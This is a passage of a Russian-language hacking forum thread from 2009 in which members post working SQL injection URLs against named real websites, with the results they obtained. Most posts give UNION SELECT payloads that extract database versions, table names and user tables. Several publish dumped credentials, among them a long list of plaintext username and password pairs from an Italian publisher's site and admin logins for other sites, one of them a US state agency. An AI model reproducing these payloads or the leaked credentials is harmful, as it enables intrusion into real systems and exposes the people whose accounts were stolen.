SQL Инъекции

Discussion in 'Уязвимости' started by m0nzt3r, 4 Jul 2006.

Thread Status:
Not open for further replies.
  1. Maestus

    Maestus Member

    Joined:
    19 Jan 2009
    Messages:
    8
    Likes Received:
    14
    Reputations:
    3
    www.sonybmgmusic.co.uk
    Просто красивая(как мне кажется) иньекция..
    Пользователи, их пароли:
    P.S. Это не боян,
    гуглим site:forum.antichat.ru sonybmgmusic.co.uk/
    результат выдал адрес
    https://forum.antichat.ru/printthread.php?t=21336&page=617&pp=10
    где находится сообщение пользователя Buddah:
    "нашел сайт очень интересный)) у самого опыта мало, может кому тоже интересно будет"
    sonybmgmusic.co.uk/artists/annie_lennox/-1/order+by+2/* 0" - а это почти ничего, тут даже инъекции нет, потаму что кроме других неверных моментов (которые имеют место быть), в первую очередь тут знак + не проходит за пробел, а проходит как просто символ '+', уже поэтому никакого order by в таком виде не будет. Написал это, потаму что кто-то обвинил в том, что я кинул боян.
     
    #9321 Maestus, 17 May 2009
    Last edited: 17 May 2009
    1 person likes this.
  2. udman

    udman Elder - Старейшина

    Joined:
    21 Apr 2009
    Messages:
    347
    Likes Received:
    109
    Reputations:
    25
    {PR6}
    http://www.effwa.org/main/page.php?number=72+UNI ON+SELECT+0,1,2,3,4,5,concat(table_name,0x0b,column_name),7,8,9,10,11,12,0x73716C696E6A666C643137,0x73716C696E6A666C643137,0x73716C696E6A666C643137,0x73716C696E6A666C643137+FROM+INFORMATION_SCHEMA.COLUMN S--


    effwadbu@web-ppb.srv.lexi.net
    5.0.67-log
    effwa

    {PR4}
    http://www.filmdigitizer.com/about.php?sid=-2+UNION+SELECT+0,concat_Ws(0x 0b,vers ion(),user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27

    5.0.67
    holmesmillet@web01.vidar.com
    vidarMain

    Все таблицы
    http://www.filmdigitizer.com/about.php?sid=-2+UNION+SELECT+0,concat_Ws(0x0b,table_name,col umn_name),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+information_schema.columns

    {PR6}
    http://www.talkingcock.com/html/article.php?sid=-2427+UNION+SELECT+0,1,2,conc at_ws(0x0b,user(),version(),dat abase()),4,5,6,7,8,9,10+--+

    thecock@localhost
    4.0.20-standard
    tc21


    http://www.talkingcock.com/html/article.php?sid=-2427+UNION+SELECT+0,1,2,con cat_ws(0x0b,email,pas s),4,5,6,7,8,9,10+FROM+tc21.users+LIMIT+8500,1+--+

    Юзеры 8500 человек
     
    #9322 udman, 17 May 2009
    Last edited: 17 May 2009
  3. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    952
    Likes Received:
    785
    Reputations:
    591
    PR: 2

    http://www.parcobelvedere.it/hotel.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os)--&l=e

    5.0.51a-5-log:pARCOBELVEDERE:pARCOBELVEDERE@r5d6.wp.wifisolution.it:debian-linux-gnu
     
    _________________________
    3 people like this.
  4. Dimionx

    Dimionx Elder - Старейшина

    Joined:
    28 Aug 2008
    Messages:
    41
    Likes Received:
    12
    Reputations:
    4
    www.chehaliscoral.com

    Code:
    http://www.chehaliscoral.com/page.php?id=-10'+union+select+concat_ws(0x3a,version(),user(),database()),2/*
    Версия - 5.0.33:
    Юзер - chehaliscoral@localhost
    БД - chehaliscoral

    Юзеры:

    Code:
    http://www.chehaliscoral.com/page.php?id=-10'+union+select+concat_ws(0x3a,id,password,email),2+from+users+limit+0,1/*
    Code:
    5:234:ryan
    Админка:
    Code:
    http://www.chehaliscoral.com/admin
    Code:
    Username - ryan
    Password - 234
     
    1 person likes this.
  5. winstrool

    winstrool ~~*MasterBlind*~~

    Joined:
    6 Mar 2007
    Messages:
    1,457
    Likes Received:
    776
    Reputations:
    834
    _http://www.floramed.ru/detailnews.php?id=-115+union+select+1,2,concat_ws(0x3a,version(),user(),database())

    4.0.27-log:flora@zvm14.host.ru:flora

    _http://www.adameva.ru/index.php?link_n=6&id_theme=30012&page=1&id_section=923+union+select+concat_ws(0x3a,EMAIL_USER,PASSWORD)+from+users+limit+1,1--&forum_desc=

    KBALENKO@MAIL.RU:pUSHKA
     
    _________________________
    #9325 winstrool, 17 May 2009
    Last edited by a moderator: 17 May 2009
    1 person likes this.
  6. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    952
    Likes Received:
    785
    Reputations:
    591
    PR: 4

    http://www.lupoeditore.it/casa_editrice/dettaglio_concorso.php?id=-1+union+select+1,version(),3,4,5,6,7--

    юзеры : http://www.lupoeditore.it/casa_editrice/dettaglio_concorso.php?id=-1+union+select+1,group_concat(concat_ws(0x3a,username,password)),3,4,5,6,7+from+gestione_utente--


    lupo:123lupetti,depensato:1234,Cirrolo:1234,tieniduro:1234,amod:1234,VENCESLAO:1234,angelo:1234,,,:,:,raro:rarissimo,cesare:1234,lunatika42:1234,annica:1234,1pixel:1234,effeblu:1234,,robotpb:pimpis,antonello:eek:nairam,gccasarano:230805,alberto.facchini:gianna,ludav:airone44,cleo:cleo98,,GINEVRA:achille,cappelli:cappelli,claudio boccardi:athenaze,gigiobill:annafalchi,sissi:geronimo,kekko:kekko,alemonti:24682468,ndindi93:asdola,sassicaia:sassicaia,ciscotn:nike2004,robinhood:robinhood,nonhodormitomai:massimo,william85:210185,fatandsowhat:lucacamilo,madrisio:madrisio,,vibodha:apritisedano,isabella:budapest,rarissimo:rarissimo,Paracelso:Mariomario,lordgc:apocalisse,barbiedoll:barbie,luiggione:paperino,alessandraterni:solita cosa,flygirl75:morrison,patrizia.kopsch,vitogreco:angolo,fulminata:farfalla,traparentesi:parole,alessandraterni:solita cosa,gigiobill:annafalchi,antonio:123lupetti,gigiobill:annafalchi,Adilon89:1989A,roby72:robylupo,Margot:230987,,sorgoles:catania,g.facciotti:degregori51,elio1954@alice.it:paolawi


    ##############################################

    http://estetika-it.ru/news.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4--

    4.1.25:estetika_user@localhost:estetika_it
     
    _________________________
    #9326 HAXTA4OK, 17 May 2009
    Last edited: 17 May 2009
    1 person likes this.
  7. erihtoney

    erihtoney Member

    Joined:
    3 Mar 2009
    Messages:
    91
    Likes Received:
    73
    Reputations:
    20
    All India Oracle Users Group
    Google PageRank : 4
    version 5.0.67-msl-icd1-log
    user aioug@localhost
    database aioug_dbt


    columns from users

    (email,pass)

     
    3 people like this.
  8. mailbrush

    mailbrush Well-Known Member

    Joined:
    24 Jun 2008
    Messages:
    2,191
    Likes Received:
    996
    Reputations:
    155
    Code:
    http://4e.plantphys.net/printer.php?ch=5&id=-1+union+select+1,2,concat_ws(0x3a,user(),database(),version()),4,5,6,7,8,9,10
    plantphy@localhost:plantphys_4e:4.0.14-standard-log
     
  9. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,543
    Likes Received:
    398
    Reputations:
    228
    ПР5
    http://sozmod.eawag.ch/cv.php?id=1+union+select+unhex(hex(TABLE_NAME))+from+information_schema.tables+/*+

    ПР5
    http://www.enrd.org/publications.php?id=-3+union+select+1,2,concat_Ws(0x3a3a,tcuser,tcpass,email,tcid,tcname),4,5,6,7+from+tbltelecenter--
    rajukhanal::rainakhanal::mahabir@gmail.com::1::Ghorepani Telecenter
     
    1 person likes this.
  10. RU.coder

    RU.coder New Member

    Joined:
    3 May 2009
    Messages:
    1
    Likes Received:
    1
    Reputations:
    0
    http://uac.unborn.at/forumv2.php?cat=4'+and+0+union+select+1,2,concat_ws(0x20,id,nick,pw,nname,icq,mail),4,5,6+from+users+where+id=1/*
     
    #9330 RU.coder, 17 May 2009
    Last edited: 17 May 2009
  11. Dagon

    Dagon Elder - Старейшина

    Joined:
    27 Mar 2006
    Messages:
    75
    Likes Received:
    24
    Reputations:
    8
    Астранань.ру

    http://www.astrakhan.ru/humour/?cmd=read_full&id=%27+UNION+SELECT+1,2,3,4,password,6,7,8+FROM+astrakhan.portal_users+where+login=%27tHunder%27/*
     
  12. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,543
    Likes Received:
    398
    Reputations:
    228
    http://ifisc.uib.es/publications/publications.php?id=-10+union+select+TABLE_NAME,2+from+information_schema.tables+limit+197,1000--

    tables:
    jos_users
    user
    virtual_users
    virtual_domains
    view_users
    users
    series_users
    series
    seminarios
    turba_shares_users
    nag_shares_users
    mnemo_shares_users
    ingo_shares_users
    horde_users
    wp_users
    usuarios
    Таблицы все закрыты((

    http://ifisc.uib.es/publications/publications.php?id=-10+union+select+concat_ws(0x3a3a,user,password),2+from+mysql.user--
     
    1 person likes this.
  13. erihtoney

    erihtoney Member

    Joined:
    3 Mar 2009
    Messages:
    91
    Likes Received:
    73
    Reputations:
    20
    version 4.0.17-nt
    user root@localhost
    database tau
     
    1 person likes this.
  14. udman

    udman Elder - Старейшина

    Joined:
    21 Apr 2009
    Messages:
    347
    Likes Received:
    109
    Reputations:
    25
    caramel@10.210.10.10
    caramel
    5.0.75-log

    В таблицах ниче интересного, админки нет
     
  15. DezMond™

    DezMond™ Elder - Старейшина

    Joined:
    10 Jan 2008
    Messages:
    2,543
    Likes Received:
    398
    Reputations:
    228
    ПР5
    http://www.fraudadvisorypanel.org/newsite/publications.php?c_id=-1+union+select+1,2,username,password,id,6,7,8,9,10,11,12,13+from+members/*

    davido1 leaden
    Админку не нашёл(
     
  16. AlexSatter

    AlexSatter Member

    Joined:
    29 Jan 2009
    Messages:
    309
    Likes Received:
    92
    Reputations:
    33
    http://web.miheeff.ru/news/?news_id=-1+union+select+1,2,TABLE_NAME,4,5,6,7,8,9,10,11+from+information_schema.tables+limit+23,1/*
    через column_name узнал, что в этой таблице есть id,login,password
    дальше копать не могу, не позволяют знания пока...

    попробовал: http://web.miheeff.ru/news/?news_id=-1+union+select+1,2,login,4,5,6,7,8,9,10,11+from+admin/*
    не работает...

    p.s. ТИЦ 40
    Если кто докопает что-интересного, напишите в лс, хотя бы понять что не правильно делал.
     
    1 person likes this.
  17. HAXTA4OK

    HAXTA4OK Super Moderator
    Staff Member

    Joined:
    15 Mar 2009
    Messages:
    952
    Likes Received:
    785
    Reputations:
    591
    http://www.ma-consult.ru/public2.php?id=-1+union+select+1,concat_ws(0x3a,version(),user(),database()),3,4--

    4.0.27-log:fgtkmcby@localhost:fgtkmcby
     
    _________________________
  18. warlok

    warlok Elder - Старейшина

    Joined:
    17 Feb 2008
    Messages:
    344
    Likes Received:
    142
    Reputations:
    81
    AlexSatter ня
    ошибка твоя заключалась в том что таблицы admin небыло в бд под которой сайт работает.
     
  19. peton

    peton New Member

    Joined:
    12 Dec 2008
    Messages:
    1
    Likes Received:
    1
    Reputations:
    4
    http://www.izone.ru/soft_admin/go.php?action=home&id=3075-1+union+select+concat(version(),char(58),database(),char(58),user())
    Дальше непрёт, хз какие там таблицы, в information_schema не роет. Есль кто подберёт, мне напишите, ок
    зы: в адресную строку смотрите ))
     
    1 person likes this.
  20. +++AndreyDevil+++

    Joined:
    28 Dec 2008
    Messages:
    126
    Likes Received:
    30
    Reputations:
    0
    ----------------
    http://www.lhfa.louisiana.gov/news/news_detail.php?ID=-100'+union+select+1,2,3,4,5,6,7,8,9/*
    ----------------------------------
    Database Version: 5.0.45
    Database name: lhfa2
    User name: lhfa@localhost
    ------------------------------------

    /admin/​


    |----------------------------------|
    admin : Lhfa$543
    |----------------------------------|
     
    2 people like this.
Loading...
Thread Status:
Not open for further replies.